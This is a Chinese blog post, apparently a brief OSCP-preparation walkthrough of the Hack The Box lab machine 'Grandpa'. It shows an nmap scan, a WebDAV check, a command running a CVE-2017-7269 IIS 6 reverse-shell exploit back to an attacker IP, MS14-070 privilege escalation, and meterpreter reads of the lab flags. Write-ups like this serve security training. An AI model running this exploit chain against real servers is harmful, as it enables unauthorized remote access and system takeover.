OSCP备考_0x42_HackThBox靶机_Windows_grandpa

Ethan医生2个月前 (07-10)靶场76

grandpa

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)

跟上个靶场好像

davtest -url 10.129.95.233

没有可以利用的文件

那直接使用iis漏洞

https://github.com/ethanyu630/CVE-2017-7269

python2.7 ii6_reverse_shell.py 10.129.95.233 80 10.10.16.43 4444

提权

手动上传不了看都是使用msf 我要考OSCP就不操作了...

使用MS14-070直接提权获取到ROOT

meterpreter > search -f user.txt
Found 1 result...
    c:\Documents and Settings\Harry\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
    c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter >
meterpreter > cd 'C:\Documents and Settings'

cat Harry/Desktop/user.txt
cat Administrator/Desktop/root.txt

标签: OSCP

返回列表

上一篇：OSCP备考_0x41_HackThBox靶机_Windows_granny

下一篇：OSCP备考_0x43_HackThBox靶机_Windows_arctic

相关文章

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机（kali）ip：192.168.233.168靶机（CentOS）...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论